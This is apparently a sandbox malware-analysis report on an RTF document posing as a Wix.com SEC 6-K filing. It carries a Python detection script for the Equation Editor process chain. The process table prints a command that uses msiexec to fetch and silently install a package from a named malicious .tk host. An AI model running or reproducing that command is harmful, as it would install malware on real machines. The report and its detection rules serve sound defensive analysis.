File name: | fb6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af |
Full analysis: | https://app.any.run/tasks/79af0a5d-f4ce-405e-af03-59f47bed01d2 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 12:12:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | 75100A10AAB352C87254756FD1083243 |
SHA1: | 94F4B3BA8E03A1814B00933D8EB7012575E7343D |
SHA256: | FB6C0B45778647CFF26079CFB5D941E5A1748951C16B743FE3E027D4331B14AF |
SSDEEP: | 384:WffMRZU5kpjXbd6Yrpwp5KSy2etruVdp3CHx42pQ0lvo/:WfcZskpjXb7iY2cGPCHmwVZo/ |
Type detection: | .rtf, Rich Text Format (100) |
Subject: | EDGAR Online Pro |
RevisionNumber: | 3 |
Company: | EDGAR Online, Inc. |
Author: | EDGAR Online HTML to RTF Converter. Version 3.0 |
Category: | 0001178913-18-000525.html.ecq |
Comments: | Source: EDGAR Online, Inc. © Copyright 2018. All rights reserved. |
Title: | Wix.com Ltd. (Form: 6-K, Received: 02/14/2018 06:28:27) |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
1892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\fb6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
3112 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe
| User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 | | | |
2140 | cmd.exe & /C CD C: & msiexec.exe /i http://lhtcom-sg.tk/love/cuck.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1619; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
836 | msiexec.exe /i http://lhtcom-sg.tk/love/cuck.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Exit code: 1619; Version: 5.0.7600.16385 (win7_rtm.090713-1255) | | | |
3680 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe
| User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) | | | |
2484 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe
| User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 | | | |
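The chain in the process table (WINWORD.EXE opens the RTF, EQNEDT32.EXE is loaded as an embedded object, EQNEDT32.EXE spawns cmd.exe, and cmd.exe runs msiexec.exe against http://lhtcom-sg.tk/love/cuck.msi) is what a detection rule should key on. The Python below is an added example, not part of the ANY.RUN report: it transcribes the six rows above into records and runs two rules over them. The rule names, the lists of Office hosts and shells, and accepting both /i and /package are this example's own assumptions. Two caveats a practitioner should keep in mind: EQNEDT32.EXE started with -Embedding under svchost.exe is how any embedded equation object is loaded, so the signal is its child shell, not the Equation Editor process itself; and in this run both cmd.exe and msiexec.exe exited with 1619 (ERROR_INSTALL_PACKAGE_OPEN_FAILED) and the GET has no HTTP status recorded, so the package was never retrieved and the rule has to fire on the command line rather than on a dropped file.

```python
"""Detection pass over the process tree this report captured.

Two rules are applied: a shell whose parent is an Office host or Equation
Editor (EQNEDT32.EXE), and a command line that asks msiexec.exe to install a
package from an http(s) URL. The rows are transcribed from the process table
above; rule names and the host/shell lists are this example's own choices,
not something the sandbox emits.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str    # executable name as the sandbox lists it
    cmdline: str  # command line, verbatim from the report
    parent: str   # parent image name as the sandbox lists it


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


SAMPLE = (r"C:\Users\admin\AppData\Local\Temp"
          r"\fb6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af.rtf")
EQNEDT = r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'
MSI_URL = "http://lhtcom-sg.tk/love/cuck.msi"

# Transcribed from the process table above.
PROCESSES = [
    Proc(1892, "WINWORD.EXE",
         rf'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "{SAMPLE}"',
         "explorer.exe"),
    Proc(3112, "EQNEDT32.EXE", EQNEDT, "svchost.exe"),
    Proc(2140, "cmd.exe", f"cmd.exe & /C CD C: & msiexec.exe /i {MSI_URL} /quiet", "EQNEDT32.EXE"),
    Proc(836, "msiexec.exe", f"msiexec.exe /i {MSI_URL} /quiet", "cmd.exe"),
    Proc(3680, "msiexec.exe", r"C:\Windows\system32\msiexec.exe /V", "services.exe"),
    Proc(2484, "EQNEDT32.EXE", EQNEDT, "svchost.exe"),
]

# Parents whose child shell is the signal. EQNEDT32.EXE -Embedding on its own is
# how any embedded equation object is loaded (via DCOM, hence parent svchost.exe),
# so it is not flagged by itself.
OFFICE_HOSTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "EQNEDT32.EXE"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def remote_msi_url(cmdline: str) -> Optional[str]:
    """URL of the package if the line installs an MSI over http(s), else None."""
    tokens = [t.lower() for t in cmdline.split()]
    if not any(t in ("/i", "-i", "/package") for t in tokens):
        return None
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def ancestry(proc: Proc, by_image: Dict[str, Proc]) -> List[str]:
    """Walk parent names back to the first process the sandbox did not record.

    The report gives parents by image name only, so the walk is by name too;
    where two rows share a name (the two EQNEDT32.EXE instances) the first wins.
    """
    chain = [proc.image]
    parent: Optional[str] = proc.parent
    while parent and parent not in chain:
        chain.append(parent)
        p = by_image.get(parent)
        parent = p.parent if p else None
    return chain[::-1]


def analyse(processes: List[Proc]) -> List[Finding]:
    by_image: Dict[str, Proc] = {}
    for p in processes:
        by_image.setdefault(p.image, p)
    findings: List[Finding] = []
    for p in processes:
        if p.image.lower() in SHELLS and p.parent.upper() in OFFICE_HOSTS:
            findings.append(Finding(p.pid, "office_child_shell",
                                    " > ".join(ancestry(p, by_image))))
        # Check every command line, so the shell that *asks* for the install
        # (PID 2140 here) is flagged even if msiexec never fetches the package.
        url = remote_msi_url(p.cmdline) if "msiexec" in p.cmdline.lower() else None
        if url:
            host = urlparse(url).hostname or "?"
            findings.append(Finding(p.pid, "msiexec_remote_install", f"{host} {url}"))
    return findings


if __name__ == "__main__":
    for f in analyse(PROCESSES):
        print(f"PID {f.pid:<5} {f.rule:<24} {f.detail}")
```

Run as-is it reports PID 2140 twice (shell under Equation Editor, and the remote MSI install it requests) and PID 836 once; the service instance of msiexec (PID 3680, `/V`) and the two Equation Editor processes are not reported. Against real telemetry the same two rules apply to Sysmon event 1 or Windows 4688 records, where parent PIDs rather than parent names are available and the ancestry walk becomes exact.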
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F5E.tmp.cvr | — | — | —
1892 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | F256365BB40E1ED143331852C8180F1C | 4EFC9EA85F203F5D2F25E4E694BD5FE976613FB15D1AB7D520BF29E0D2F4CFDA
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6c0b45778647cff26079cfb5d941e5a1748951c16b743fe3e027d4331b14af.rtf | pgc | 665992045C86C763E67175AEE8083E62 | 66E129E2F2D102965FF11BC39211F0CD342F5CE776D4EC3C6D6188F0A33A4C1F
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3680 | msiexec.exe | GET | — | 195.248.234.34:80 | http://lhtcom-sg.tk/love/cuck.msi | UA | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3680 | msiexec.exe | 195.248.234.34:80 | lhtcom-sg.tk | ON-LINE Ltd | UA | suspicious |
Domain | IP | Reputation
---|---|---
lhtcom-sg.tk | — | suspicious
PID | Process | Class | Message |
---|---|---|---|
3680 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |
3680 | msiexec.exe | Potentially Bad Traffic | ET POLICY HTTP Request to a *.tk domain |